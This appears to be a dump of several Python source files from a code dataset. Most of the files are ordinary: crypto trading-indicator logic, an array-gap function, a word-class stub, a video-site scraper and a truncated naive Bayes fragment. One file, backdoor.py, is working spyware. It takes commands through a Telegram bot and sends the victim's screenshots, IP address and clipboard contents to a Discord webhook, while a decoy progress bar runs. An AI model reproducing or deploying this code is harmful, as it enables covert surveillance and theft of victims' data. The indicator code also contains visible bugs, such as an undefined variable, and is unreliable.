traceback.print_exc()\n\n return (indicatorTypeCoinMap, new_result);\n\n def isBottom2B(self, volume, opened, close):\n # -- price\n priceMatches2BPattern = (opened[-3] > close[-3]) and (opened[-2] < close[-2])\\\n and (opened[-2] <= (close[-3] + (opened[-3] - close[-3])*0.05))\\\n and (close[-2] > opened[-3])\n # -- volume\n volumeMatches2BPattern = (volume[-3] < volume[-2])\n\n # -- price\n priceMatches2BPatternMinusOne = (opened[-4] > close[-4]) and (opened[-3] < close[-3])\\\n and (opened[-3] <= (close[-4] + (opened[-4] - close[-4])*0.05))\\\n and (close[-3] > opened[-4])\n # -- volume\n volumeMatches2BPatternMinusOne = (volume[-4] < volume[-3])\n\n # --indicator\n return (priceMatches2BPattern and volumeMatches2BPattern) \\\n or (priceMatches2BPatternMinusOne and volumeMatches2BPatternMinusOne)\n\n def tdDeteminator(self, gap, td):\n td9PositiveFlag = False\n td9NegativeFlag = False\n td13PositiveFlag = False\n 
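        # Note: 'gap' selects how many bars back to inspect -- gap=2 reads the most recent closed\n        # candle, gap=3 the one before it (the caller pairs that with a 2B check one bar later).\n        # Negative counts (-9/-13) mark TD bottom setups, positive counts (9/13) mark tops.\n        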
td13NegativeFlag = False\n td1PositiveFlag = False\n td2PositiveFlag = False\n\n if (td[len(td) - gap] == 9):\n td9PositiveFlag = True;\n\n if (td[len(td) - gap] == -9):\n td9NegativeFlag = True;\n\n if (td[len(td) - gap] == 13):\n td13PositiveFlag = True;\n\n if (td[len(td) - gap] == -13):\n td13NegativeFlag = True;\n\n if (td[len(td) - gap] == 1):\n td1PositiveFlag = True;\n\n if (td[len(td) - gap] == 2):\n td2PositiveFlag = True;\n\n return td9PositiveFlag, td9NegativeFlag, td13PositiveFlag, td13NegativeFlag, td1PositiveFlag, td2PositiveFlag;\n\n def isOverceedingTriangleLine(self, loc_ids, ohlcv):\n indexX1 = loc_ids[0]\n indexX2 = loc_ids[1]\n priceX1 = ohlcv['close'][indexX1] if ohlcv['close'][indexX1] > ohlcv['open'][indexX1] else ohlcv['open'][indexX1];\n priceX2 = ohlcv['close'][indexX2] if ohlcv['close'][indexX2] > ohlcv['open'][indexX1] else ohlcv['open'][indexX2];\n slope = self.getSlope(priceX1, indexX1, priceX2, indexX2);\n slopedPrice = self.calculatePriceAtGivenPlace(slope, indexX1, priceX1);\n return self.isGreaterThanSlopedPrice(slopedPrice);\n\n def isGreaterThanSlopedPrice(self, slopedPrice):\n # close[0] > open[0] && close[0] > estimatedValue && close[-1] <= estimatedValue\n if (ohlcv[0] > slopedPrice):\n return True;\n else:\n return False;\n\n def calculatePriceAtGivenPlace(self, slope, indexX2, x2):\n return slope * indexX2 + x2;\n\n def getSlope(self, x1, indexX1, x2, indexX2):\n return (x2 - x1) / (indexX2 - indexX1);\n\n def candleOverEma(self, opened, close, ema):\n currentCandleOverEma = (opened[len(opened)-1] < ema[len(ema)-1]) and (ema[len(ema)-1] < close[len(close)-1])\n previousCandleIsNotOverEma = not ((opened[len(opened)-2] < ema[len(ema)-2]) and (ema[len(ema)-2] < close[len(close)-2]))\n if currentCandleOverEma and previousCandleIsNotOverEma:\n return True;\n\n def getVariance(self, delta_macd, n):\n delta_max = np.max(np.abs(delta_macd));\n # maxMinNormalization = lambda x : (x - delta_min) / (delta_max - delta_min);\n # normalizedDeltaMacd = maxMinNormalization(delta_macd);\n variance = np.std(delta_macd[0 - n:], ddof=1);\n mean = np.mean(delta_macd[0 - n:]);\n return (variance, mean, delta_max)\n\n #check if ema7 is crossing over ema65\n def ema7OverEma65(self, ema7, ema65):\n N = 5\n #check 5 is below all lines\n arr = []\n for index in range(1, N):\n arr.append((ema7[len(ema7)-index] > ema65[len(ema65)-index]))\n if ((ema7[len(ema7)-index-1] < ema65[len(ema65)-index-1]) and (ema7[len(ema7)-index] > ema65[len(ema65)-index])):\n if(all(flag == True for flag in arr)):\n return True;\n return False;\n\n #check if ema7 is crossing over ema22\n def ema7OverEma22(self, ema7, ema22):\n N = 5\n #check 5 is below all lines\n arr = []\n for index in range(1, N):\n arr.append((ema7[len(ema7)-index] > ema22[len(ema22)-index]))\n if ((ema7[len(ema7)-index-1] < ema22[len(ema22)-index-1]) and (ema7[len(ema7)-index] > ema22[len(ema22)-index])):\n if(all(flag == True for flag in arr)):\n return True;\n return False;\n\n #check if ema7 is crossing over ema33\n def ema7OverEma33(self, ema7, ema33):\n N = 5\n #check 5 is below all lines\n arr = []\n for index in range(1, N):\n arr.append((ema7[len(ema7)-index] > ema33[len(ema33)-index]))\n if ((ema7[len(ema7)-index-1] < ema33[len(ema33)-index-1]) and (ema7[len(ema7)-index] > ema33[len(ema33)-index])):\n if(all(flag == True for flag in arr)):\n return True;\n return False;\n\n def lastNKIsPositive(self, distance_close_open):\n N = 3;\n for i in range(N):\n if (distance_close_open[len(distance_close_open)-i-1] < 0):\n 
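                # Note: bails out with False as soon as one of the last N candles closed below its\n                # open, so a True result means N consecutive green candles.\n                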
return False;\n return True;\n\n######################## main strategy #######################################\n def detectFirstMacdPositiveSlotPosition(self, macd):\n flag = False;\n for i in range(len(macd)-1, -1, -1):\n if (macd[i] > 0):\n if (flag == True):\n return i + 1;\n else:\n flag = True;\n\n if(i == 0):\n return 0;\n elif (flag == True) :\n return i;\n\n def detectMacdVolumeShrinked(self, macd, start):\n maxIndex = self.getIndexOfMacdPeak(macd, start)\n max = macd[(maxIndex-len(macd))]\n loc = maxIndex\n for index, value in enumerate(macd[(maxIndex - len(macd)):]):\n if(value < max):\n return True;\n loc = loc + 1\n return False;\n\n #deprecated\n def detectBottomDivergenceIsPositiveMacd(self, macd, data, start):\n minIndex = self.getIndexOfMacdValley(macd, start)\n min = data[(minIndex-len(macd))]\n loc = minIndex\n for index, value in enumerate(data[(minIndex-len(macd)):]):\n if(value < min):\n if(macd[ index + (minIndex-len(macd)) ] > 0):\n return True;\n loc = loc + 1\n return False;\n\n #段内底背离\n #macd=[1, 3, -3, -4, -1, -3, -1]\n #data=[10, 9, 8, 7, 8, 5, 8]\n def detectBottomDivergence(self, delta_macd, data, macd_signal):\n try:\n delta_len = (len(data) - len(macd_signal))\n zeroMacd = self.detectMacdSlots(delta_macd, 0, \"negative\")\n if not zeroMacd:\n return False;\n\n (start, end) = zeroMacd\n min = self.getIndexOfMacdValley(delta_macd, start, end)\n for i in range(min, end, 1):\n if(0 > delta_macd[i] > delta_macd[min]) and (data[i + delta_len] < data[min + delta_len]) \\\n and (macd_signal[i] < 0 and macd_signal[min] < 0):\n return True;\n except Exception as e:\n print(\"段内底背离 异常:\")\n print(e)\n return False\n\n #段内顶背离\n def detectPeakDivergence(self, delta_macd, data, macd_signal):\n try:\n delta_len = (len(data) - len(macd_signal))\n zeroMacd = self.detectMacdSlots(delta_macd, 0, \"positive\")\n if not zeroMacd:\n return False;\n\n (start, end) = zeroMacd\n maxx = self.getIndexOfMacdPeak(delta_macd, start, end)\n for i in range(maxx, end, 1):\n if(0 < delta_macd[i] < delta_macd[maxx]) and (data[i + delta_len] > data[maxx + delta_len]) \\\n and (macd_signal[i] > 0 and macd_signal[maxx] > 0):\n return True;\n except Exception as e:\n print(\"段内顶背离 异常:\")\n print(e)\n return False\n\n #分立跳空底背离\n def detectMultipleBottomDivergence(self, delta_macd, data, macd_signal):\n try:\n delta_len = (len(data) - len(macd_signal))\n zeroMacd = self.detectMacdSlots(delta_macd, 0, \"negative\")\n firstMacd = self.detectMacdSlots(delta_macd, 1, \"negative\")\n if not zeroMacd or not firstMacd:\n return False;\n\n (start1, end1) = zeroMacd\n (start2, end2) = firstMacd\n min1 = self.getIndexOfMacdValley(delta_macd, start1, end1)\n min2 = self.getIndexOfMacdValley(delta_macd, start2, end2)\n if (delta_macd[min2] < delta_macd[min1] < 0) \\\n and (data[min2 + delta_len] > data[min1 + delta_len]) \\\n and (macd_signal[min2] < 0 and macd_signal[min1] < 0):\n return True;\n else:\n return False;\n except Exception as e:\n print(\"分立跳空底背离:\")\n print(e)\n return False\n\n #分立跳空顶背离\n def detectMultiplePeakDivergence(self, delta_macd, data, macd_signal):\n try:\n delta_len = (len(data) - len(macd_signal))\n zeroMacd = self.detectMacdSlots(delta_macd, 0, \"positive\")\n firstMacd = self.detectMacdSlots(delta_macd, 1, \"positive\")\n if not zeroMacd or not firstMacd:\n return False;\n\n (start1, end1) = zeroMacd\n (start2, end2) = firstMacd\n max1 = self.getIndexOfMacdPeak(delta_macd, start1, end1)\n max2 = self.getIndexOfMacdPeak(delta_macd, start2, end2)\n if (delta_macd[max2] > 
delta_macd[max1] > 0) \\\n and (data[max2 + delta_len] < data[max1 + delta_len]) \\\n and (macd_signal[max1] > 0 and macd_signal[max2] > 0):\n return True;\n else:\n return False;\n except Exception as e:\n print(\"分立跳空顶背离:\")\n print(e)\n return False\n\n def detectMacdSlots(self, macd, times, direction):\n start = len(macd)-1\n initialPoint = start\n directionIsPositive = (direction == 'positive');\n if (macd[start] > 0) ^ directionIsPositive:\n return (-1, -1)\n start = self.walksOneSlotLength(macd, start);\n if(times == 0):\n return (start+1, initialPoint)\n for i in range(start, -1, -1):\n i = self.walksOneSlotLength(macd, i);\n slotStart = i\n i = self.walksOneSlotLength(macd, i);\n times = times - 1;\n if (times == 0):\n return (i+1, slotStart)\n\n def walksOneSlotLength(self, slot, start):\n isPositive = (slot[start] > 0);\n for i in range(start, -1, -1):\n if (not (isPositive^(slot[i] <= 0))):\n return i;\n return -1;\n\n\n #Test: a=[1,2,3,4,5,6,-1,-2]\n def detectLastMacdNegativeSlots(self, macd):\n flag = False;\n for i in range(len(macd)-1, -1, -1):\n if (macd[i] > 0):\n if(flag == True):\n return i+1;\n elif (flag == False):\n flag = True;\n\n def getIndexOfMacdPeak(self, macd, start, end):\n maxx = start\n for i in range(start, end):\n if(macd[i] > macd[maxx]):\n maxx = i;\n return maxx;\n\n def getIndexOfMacdValley(self, macd, start, end):\n min = start\n for i in range(start, end):\n if(macd[i] < macd[min]):\n min = i;\n return min;\n ################################################################\n\n def isTheIntersectionPointCloseToBePositive(self, macd, macd_signal, n, intersectionValueAndMin):\n return self.calIntersectionPointRate(self.GetIntersectPointofLines(self.organizeDataPoint(macd, macd_signal, n))[0], macd, intersectionValueAndMin) is not None ;\n\n def organizeDataPoint(self, macd, macd_signal, n):\n return (macd[len(macd)-1-n], 1, macd[len(macd)-n], 2, macd_signal[len(macd_signal)-1-n], 1, macd_signal[len(macd_signal)-n], 2);\n\n def calIntersectionPointRate(self, intersectionValue, macd, intersectionValueAndMin): #intersectionRate\n (result, min) = self.lastNMinusMacdVolume(macd)\n intersectionValueAndMin[0] = intersectionValue;\n intersectionValueAndMin[1] = min;\n return intersectionValueAndMin;\n\n def GeneralEquation(self, first_x,first_y,second_x,second_y):\n A=second_y - first_y\n B=first_x - second_x\n C=second_x*first_y - first_x*second_y\n return A,B,C\n\n def GetIntersectPointofLines(self, vector):\n x1 = vector[0]\n y1 = vector[1]\n x2 = vector[2]\n y2 = vector[3]\n x3 = vector[4]\n y3 = vector[5]\n x4 = vector[6]\n y4 = vector[7]\n A1,B1,C1 = self.GeneralEquation(x1,y1,x2,y2)\n A2, B2, C2 = self.GeneralEquation(x3,y3,x4,y4)\n m=A1*B2-A2*B1\n if m==0:\n print(\"no intersection\")\n else:\n x=(C2*B1-C1*B2)/m\n y=(C1*A2-C2*A1)/m\n return x,y\n\n def lastNBoolIsNarrowed(self, delta_boll,n):\n test_arr = delta_boll[0-n:];\n for x in test_arr:\n if(x > 5.0): #narrowed area\n return (False, test_arr);\n return (True, test_arr);\n\n def lastNDMIIsPositive(self, delta_dmi,n):\n if ((delta_dmi[len(delta_dmi) - 1] > 0 and\n delta_dmi[len(delta_dmi) - 2] < 0)\n\n or\n\n (delta_dmi[len(delta_dmi) - 1] > 0 and\n delta_dmi[len(delta_dmi) - 2] > 0 and\n delta_dmi[len(delta_dmi) - 3] < 0)):\n\n return True;\n return False;\n\n # theOneBefore = delta_dmi[len(delta_dmi) - n - 1];\n # flag = self.lastNDataIsPositive(delta_dmi, n);\n # if(flag):\n # return (theOneBefore < 0);\n # else:\n # return flag;\n\n def lastNDataIsPositive(self, delta, n):\n test_arr = 
delta[0 - n:];\n        for x in test_arr:\n            if (x < 0):\n                return False;\n        return True;\n\n    def printResult(self, new_result, exchange, market_pair, output_mode, criteriaType, indicatorTypeCoinMap):\n        output_data = deepcopy(new_result[exchange][market_pair])\n        print(\n            exchange,\n            criteriaType,\n            self.output[output_mode](output_data, criteriaType, market_pair, exchange, indicatorTypeCoinMap),\n            end=''\n        )\n\n    def toDb(self, td_name, exchange, market_pair):\n        candle_period = self.indicator_conf['macd'][0]['candle_period'];\n        sql = \"INSERT INTO td(td_name, market_pair, candle_period, exchange, create_date) \" \\\n              \"select distinct %s,%s,%s,%s,%s from dual where not exists( select 1 from td \" \\\n              \"where td_name = %s and market_pair = %s and candle_period = %s and exchange = %s \" \\\n              \"and create_date >= date_sub(%s, interval 10 day) and create_date <= %s)\"\n        val = (td_name, market_pair, candle_period, exchange, date.today(),\n               td_name, market_pair, candle_period, exchange, date.today(), date.today())\n        Behaviour.mydb.cursor().execute(sql, val)\n        Behaviour.mydb.commit() # the table contents were updated, so this commit statement is required\n        print(Behaviour.mydb.cursor().rowcount, \"record inserted successfully.\")\n\n    def lastNMacdsArePositive(self, delta_macd, macd, n):\n        (result, min) = self.lastNMinusMacdVolume(macd)\n        test_arr = delta_macd[0-n:];\n        theOneBefore = delta_macd[len(delta_macd)-n-1];\n        for x in test_arr:\n            if(x < 0 or (abs(x/min) >= 0.3)): #the ratio of the macd value to the most negative macd value must stay below 0.3\n                return False;\n        \n        return True;\n    \n    def lastNMinusDecreased(self, delta_macd, min):\n        # True when the minimum occurs anywhere after the first bar\n        for i in range(len(delta_macd)):\n            if(delta_macd[i] == min and i != 0):\n                return True;\n        return False;\n    \n    def lastNMinusMacdVolume(self, delta_macd):\n        result = []\n        min = 0\n        negativeStarted = False\n        for x in reversed(delta_macd):\n            if(x <= 0):\n                negativeStarted = True\n                if(x < min):\n                    min = x\n                result.append(x)\n            elif negativeStarted: #always return from here\n                return (result, min)\n        return (result, min)\n    \n    def _hasMinusBefore(self, arr, informant):\n        n = len(arr)\n        period = informant[0][\"candle_period\"]\n        if period == '1d':\n            N = 10\n        elif period == '1w':\n            N = 3\n        else:\n            N = 10\n        try:\n            for index in range(n-1, n-1-N, -1):\n                if arr[index] <= 0:\n                    return True;\n            return False;\n        except Exception as e: \n            print(\"An exception occurred:\" + str(e))\n        \n    def _lis(self, arr):\n        n = len(arr)\n        m = [0]*n\n        for x in range(n-2,-1,-1):\n            for y in range(n-1,x,-1):\n                if arr[x] < arr[y] and m[x] <= m[y]:\n                    m[x] += 1\n        max_value = max(m)\n        result = []\n        for i in range(n):\n            if m[i] == max_value:\n                result.append(arr[i])\n                max_value -= 1\n        return result\n    \n    \n    def _get_indicator_results(self, exchange, market_pair):\n        \"\"\"Execute the indicator analysis on a particular exchange and pair.\n\n        Args:\n            exchange (str): The exchange to get the indicator results for.\n            market_pair (str): The pair to get the market pair results for.\n\n        Returns:\n            list: A list of dictionaries containing the results of the analysis.\n        \"\"\"\n\n        results = { indicator: list() for indicator in self.indicator_conf.keys() }\n        historical_data_cache = dict()\n\n        # for indicator in self.indicator_conf:\n        #     if indicator not in self.indicator_dispatcher:\n        #         self.logger.warn(\"No such indicator %s, skipping.\", indicator)\n        #         continue\n\n        for indicator in self.indicator_dispatcher:\n            for indicator_conf in self.indicator_conf[indicator]:\n                if indicator_conf['enabled']:\n                    candle_period = indicator_conf['candle_period']\n                else:\n                    self.logger.debug(\"%s is disabled, 
skipping.\", indicator)\n continue\n\n if candle_period not in historical_data_cache:\n historical_data_cache[candle_period] = self._get_historical_data(\n market_pair,\n exchange,\n candle_period\n )\n\n if historical_data_cache[candle_period]:\n analysis_args = {\n 'historical_data': historical_data_cache[candle_period],\n 'signal': indicator_conf['signal'],\n 'hot_thresh': indicator_conf['hot'],\n 'cold_thresh': indicator_conf['cold']\n }\n\n if 'period_count' in indicator_conf:\n analysis_args['period_count'] = indicator_conf['period_count']\n\n results[indicator].append({\n 'result': self._get_analysis_result(\n self.indicator_dispatcher,\n indicator,\n analysis_args,\n market_pair\n ),\n 'config': indicator_conf\n })\n return results\n\n\n def _get_informant_results(self, exchange, market_pair):\n \"\"\"Execute the informant analysis on a particular exchange and pair.\n\n Args:\n exchange (str): The exchange to get the indicator results for.\n market_pair (str): The pair to get the market pair results for.\n\n Returns:\n list: A list of dictinaries containing the results of the analysis.\n \"\"\"\n\n results = { informant: list() for informant in self.informant_conf.keys() }\n historical_data_cache = dict()\n\n # for informant in self.informant_conf:\n # if informant not in self.informant_dispatcher:\n # self.logger.warn(\"No such informant %s, skipping.\", informant)\n # continue\n for informant in self.informant_dispatcher:\n\n for informant_conf in self.informant_conf[informant]:\n if informant_conf['enabled']:\n candle_period = informant_conf['candle_period']\n else:\n self.logger.debug(\"%s is disabled, skipping.\", informant)\n continue\n\n if candle_period not in historical_data_cache:\n historical_data_cache[candle_period] = self._get_historical_data(\n market_pair,\n exchange,\n candle_period\n )\n\n if historical_data_cache[candle_period]:\n analysis_args = {\n 'historical_data': historical_data_cache[candle_period]\n }\n\n if 'period_count' in informant_conf:\n analysis_args['period_count'] = informant_conf['period_count']\n\n results[informant].append({\n 'result': self._get_analysis_result(\n self.informant_dispatcher,\n informant,\n analysis_args,\n market_pair\n ),\n 'config': informant_conf\n })\n\n return results\n\n\n def _get_crossover_results(self, new_result):\n \"\"\"Execute crossover analysis on the results so far.\n\n Args:\n new_result (dict): A dictionary containing the results of the informant and indicator\n analysis.\n\n Returns:\n list: A list of dictinaries containing the results of the analysis.\n \"\"\"\n\n crossover_dispatcher = self.strategy_analyzer.crossover_dispatcher()\n results = { crossover: list() for crossover in self.crossover_conf.keys() }\n\n for crossover in self.crossover_conf:\n if crossover not in crossover_dispatcher:\n self.logger.warn(\"No such crossover %s, skipping.\", crossover)\n continue\n\n for crossover_conf in self.crossover_conf[crossover]:\n if not crossover_conf['enabled']:\n self.logger.debug(\"%s is disabled, skipping.\", crossover)\n continue\n \n key_indicator = new_result[crossover_conf['key_indicator_type']][crossover_conf['key_indicator']][crossover_conf['key_indicator_index']]\n crossed_indicator = new_result[crossover_conf['crossed_indicator_type']][crossover_conf['crossed_indicator']][crossover_conf['crossed_indicator_index']]\n\n dispatcher_args = {\n 'key_indicator': key_indicator['result'],\n 'key_signal': crossover_conf['key_signal'],\n 'key_indicator_index': crossover_conf['key_indicator_index'],\n 
'crossed_indicator': crossed_indicator['result'],\n 'crossed_signal': crossover_conf['crossed_signal'],\n 'crossed_indicator_index': crossover_conf['crossed_indicator_index']\n }\n\n results[crossover].append({\n 'result': crossover_dispatcher[crossover](**dispatcher_args),\n 'config': crossover_conf\n })\n return results\n\n\n def _get_historical_data(self, market_pair, exchange, candle_period):\n \"\"\"Gets a list of OHLCV data for the given pair and exchange.\n\n Args:\n market_pair (str): The market pair to get the OHLCV data for.\n exchange (str): The exchange to get the OHLCV data for.\n candle_period (str): The timeperiod to collect for the given pair and exchange.\n\n Returns:\n list: A list of OHLCV data.\n \"\"\"\n\n historical_data = list()\n try:\n historical_data = self.exchange_interface.get_historical_data(\n market_pair,\n exchange,\n candle_period\n )\n except RetryError:\n self.logger.error(\n 'Too many retries fetching information for pair %s, skipping',\n market_pair\n )\n except ExchangeError:\n self.logger.error(\n 'Exchange supplied bad data for pair %s, skipping',\n market_pair\n )\n except ValueError as e:\n self.logger.error(e)\n self.logger.error(\n 'Invalid data encountered while processing pair %s, skipping',\n market_pair\n )\n self.logger.debug(traceback.format_exc())\n except AttributeError:\n self.logger.error(\n 'Something went wrong fetching data for %s, skipping',\n market_pair\n )\n self.logger.debug(traceback.format_exc())\n return historical_data\n\n\n def _get_analysis_result(self, dispatcher, indicator, dispatcher_args, market_pair):\n \"\"\"Get the results of performing technical analysis\n\n Args:\n dispatcher (dict): A dictionary of functions for performing TA.\n indicator (str): The name of the desired indicator.\n dispatcher_args (dict): A dictionary of arguments to provide the analyser\n market_pair (str): The market pair to analyse\n\n Returns:\n pandas.DataFrame: Returns a pandas.DataFrame of results or an empty string.\n \"\"\"\n\n try:\n results = dispatcher[indicator](**dispatcher_args)\n except TypeError:\n self.logger.info(\n 'Invalid type encountered while processing pair %s for indicator %s, skipping',\n market_pair,\n indicator\n )\n self.logger.info(traceback.format_exc())\n results = str()\n return results\n","sub_path":"app/behaviour.py","file_name":"behaviour.py","file_ext":"py","file_size_in_byte":57166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"503645680","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 30 19:39:55 2021\n\n@author: tenor2000\n\"\"\"\n\ndef maximumGap(nums): \n '''\n type: List[int]\n rtype: int\n '''\n if len(nums) < 2:\n return 0\n nums = sorted(nums)\n maxgap = 0\n for x, y in enumerate(nums):\n maxgap = max(maxgap, nums[x] - nums[x-1])\n \n return maxgap","sub_path":"Maximum_Gap.py","file_name":"Maximum_Gap.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"607130853","text":"\n\nfrom xai.brain.wordbase.nouns._gusset import _GUSSET\n\n#calss header\nclass _GUSSETS(_GUSSET, ):\n\tdef __init__(self,): \n\t\t_GUSSET.__init__(self)\n\t\tself.name = \"GUSSETS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"gusset\"\n\t\tself.jsondata = 
{}\n","sub_path":"xai/brain/wordbase/nouns/_gussets.py","file_name":"_gussets.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"256423935","text":"import requests\nimport pyautogui\nimport win32clipboard\nimport time\nimport os\nimport threading\nfrom typing import Dict\n\n\n\nclass Logger:\n tgtoken = \"\"\n dhook = \"\"\n admin = \"hkeydesign\"\n\n @classmethod\n def log(cmd,message,ss):\n response = True\n\n r = requests.post(Logger.dhook,data={\n 'content':message\n },files={\n 'file.png':ss\n })\n\n if str(r) != '':\n response = False\n\n return response\n\n @classmethod\n def screen_shot(cmd):\n pyautogui.screenshot(os.environ[\"USERPROFILE\"] + r\"\\AppData\\Local\\Google\\Chrome\\User Data\\resim.jpg\")\n\n jpgfile = open(os.environ[\"USERPROFILE\"] + r\"\\AppData\\Local\\Google\\Chrome\\User Data\\resim.jpg\", \"rb\").read()\n\n resp = Logger.log(f'Screen Shot',jpgfile)\n\n return resp\n\n @classmethod\n def checkit(cmd) -> Dict[str, str]:\n r = requests.get(f'https://api.telegram.org/bot{Logger.tgtoken}/getUpdates').json()\n \n status = True\n message = None\n author = None\n\n try:\n message = r['result'][-1]['message']['text']\n author = r['result'][-1]['message']['chat']['username']\n date = r['result'][-1]['message']['date']\n except:\n status = False\n \n result = {\n 'status':status,\n 'message':message,\n 'author':author,\n 'date':date\n }\n\n return result\n\n @classmethod\n def ip_adress(cmd):\n r = requests.get('https://api.ipify.org')\n ip = r.text\n print(ip)\n\n resp = Logger.log(f'Adress: {ip}',None)\n\n return resp\n\n @classmethod\n def getcboard(cmd):\n win32clipboard.OpenClipboard()\n data = win32clipboard.GetClipboardData()\n win32clipboard.CloseClipboard()\n\n resp = Logger.log(f'Clipboard: {data}',None)\n\n return resp\n\ndef oneff():\n last = {'date':None}\n\n while True:\n rsp = Logger.checkit()\n if rsp['status'] == True and rsp['author'] == Logger.admin:\n\n if rsp['message'] == 'ip' and rsp['date'] != last['date']:\n ip = Logger.ip_adress()\n last = rsp\n\n elif rsp['message'] == 'foto' and rsp['date'] != last['date']:\n Logger.screen_shot()\n last = rsp\n\n elif rsp['message'] == 'cboard' and rsp['date'] != last['date']:\n Logger.getcboard()\n last = rsp\n\n time.sleep(2)\n\ndef sayac(n):\n print(f'[{n*\"-\"}]', end=\"\")\n\n print('\\b'*(n+1), end=\"\")\n\n for _ in range(n):\n print(flush=True, end=\"\")\n print('*', end=\"\")\n time.sleep(10)\n\nx = threading.Thread(target=oneff, args=())\nx.start()\n\ny = threading.Thread(target=sayac, args=(100,))\ny.start()\n","sub_path":"backdoor.py","file_name":"backdoor.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"146601761","text":"\nfrom __future__ import absolute_import\n\nimport re\nfrom lxml import html\nimport logging\nfrom fetcher.studio import BaseStudio\nfrom fetcher.videolist import VideoList, VideoListFilterFile\nfrom .video import BelAmiVideo\nimport os\nfrom optparse import OptionGroup\nfrom time import sleep\nimport simplejson as json\n\nlogger = logging.getLogger(__name__)\n\n\nclass BelAmiStudio(BaseStudio):\n auth_post_url = \"http://club.belamionline.com/clublogin/login.asp\"\n main_page = \"http://club.belamionline.com/entrance/Simple2015.aspx\"\n content_items_list_page = \"http://club.belamionline.com/entrance/\" \\\n \"WebServices/ContentItemsListWebService.asmx/\" \\\n 
\"GetContentItemsListControl\"\n item_page = \"http://club.belamionline.com/entrance/Content.aspx?Id=%s\"\n thumbnail_page = \"http://club.belamionline.com/entrance/%s\"\n\n def add_option_group(self, parser):\n group = OptionGroup(parser, \"Bel Ami Options\")\n group.add_option(\"--belami-username\", dest=\"belami_username\",\n help=\"Username for belami.com\")\n group.add_option(\"--belami-password\", dest=\"belami_password\",\n help=\"Password for belami.com\")\n group.add_option(\"--belami-target\", dest=\"belami_target\",\n help=\"Target directory for downloads from \"\n \"belami.com\")\n parser.add_option_group(group)\n\n def set_options(self, limit, reverse, options):\n logger.debug(\"Setting options for %s\" % __name__)\n self._username = options['username']\n self._password = options['password']\n self._target = options['target']\n\n self._validate()\n\n model = options['model'] if 'model' in options else None\n if model and not re.match(r\"/[0-9]+/[a-zA-Z]+/\", model):\n raise Exception(\"The model name must be in the format \"\n \"/NUMBER/NAME, e.g. /664/jess/\")\n self.model = model\n self.page = options['page'] if 'page' in options else None\n\n self.limit = limit\n self.reverse = reverse\n\n def _authenticate(self):\n if self._authenticated:\n logger.debug(\"Skipping authentication because already \"\n \"authenticated.\")\n return\n\n # Authenticate\n data = {\n 'txtUser': self._username,\n 'txtPass': self._password,\n \"input\": \"\",\n \"page\": BelAmiStudio.main_page,\n \"Forward\": \"\",\n \"Action\": \"LOGIN\",\n }\n r = self.session.post(BelAmiStudio.auth_post_url, data=data)\n r.raise_for_status()\n\n url = BelAmiStudio.main_page\n\n sleep(5)\n logger.debug(\"Fetching main page %s\" % url)\n page = self.session.get(url)\n page.raise_for_status()\n sleep(1)\n\n self._authenticated = True\n\n def _update_video_list(self):\n fetched_file = os.path.join(self._target, '.fetched')\n self._videos = VideoList(VideoListFilterFile(fetched_file))\n\n self._authenticate()\n\n url = BelAmiStudio.content_items_list_page\n logger.debug(\"Getting clip data from %s\" % url)\n data = {\n \"contextKey\": \"ContentBox2#SimpleVideosSexScenesAll#1###undefined\"\n }\n page = self.session.post(url, json=data)\n video_content_box = json.loads(page.content)[\"d\"]\n tree = html.fromstring(video_content_box)\n links = tree.xpath('//*[@id=\"ContentBox2_PopulateArea\"]/div/div[1]/'\n 'div[2]/a')\n\n if self.reverse:\n links.reverse()\n\n count = 1\n for link in links:\n title = link.find('img').get('alt').strip().replace('\"', '')\n slug = re.sub(\"[^0-9]+\", \"\", link.get('onclick'))\n description_url = BelAmiStudio.item_page % slug\n video = BelAmiVideo(slug, description_url, self.session, title)\n\n if self._videos.is_item_fetched(video):\n continue\n\n self._videos[slug] = video\n count += 1\n if count > self.limit:\n logger.debug(\"Hit video fetch limit for %s\" % self.name)\n break\n\n def video_from_filename(self, filename):\n (slug, title) = self._slug_from_filename(filename, \"Bel Ami\")\n description_url = BelAmiStudio.item_page % slug\n\n self._authenticate()\n video = BelAmiVideo(slug, description_url, self.session, title)\n video._update_all()\n return video\n\n\ndef init():\n return BelAmiStudio()\n","sub_path":"fetcher/belami/studio.py","file_name":"studio.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"344378342","text":"num_entries_per_category = {}\nfuscat1 = {} # 
{'spo':}\nint_one = 1\nfloat_one = 1.0\n\ndef predict(features):\n features = {'spo': ((int((features[0] * 100.0)) * 1000000.0) + int((features[1] * 100.0)))}\n ugooki2 = []\n fuscat2 = sum(num_entries_per_category.itervalues())\n for jjdi1 in num_entries_per_category:\n Chri4 = (num_entries_per_category[jjdi1] / fuscat2)\n for fuscat3 in features:\n if ((fuscat3 in fuscat1) and (features[fuscat3] in fuscat1[fuscat3]) and (jjdi1 in fuscat1[fuscat3][features[fuscat3]])):\n Chri4 *= (fuscat1[fuscat3][features[fuscat3]][jjdi1] / num_entries_per_category[jjdi1])\n else:\n Chri4 *= (0.01 / fuscat2)\n ugooki2.append((jjdi1, Chri4))\n ugooki2 = sorted(ugooki2, key=(lambda ormow1: (1 - ormow1[1])))\n jjdi3 = sum(map((lambda Chri3: Chri3[1]), ugooki2))\n ugooki2 = map((lambda fuscat5: ((fuscat5[0] * fuscat5[1]) / jjdi3)), ugooki2)\n ugooki2 = sum(ugooki2)\n # This seems to be a number that is either 0, very small, 0.5 or very nearly\n # 1\n #print ugooki2\n return ugooki2\n\ndef train(features, label):\n global int_one\n features = {'spo': ((int((features[0] * 100.0)) * 1000000.0) + int((features[1] * 100.0)))}\n for feature_key in features:\n # fuscat1 is a global variable\n if feature_key not in fuscat1:\n fuscat1[feature_key] = {} \n if features[feature_key] not in fuscat1[feature_key]:\n fuscat1[feature_key][features[feature_key]] = {}\n if label not in 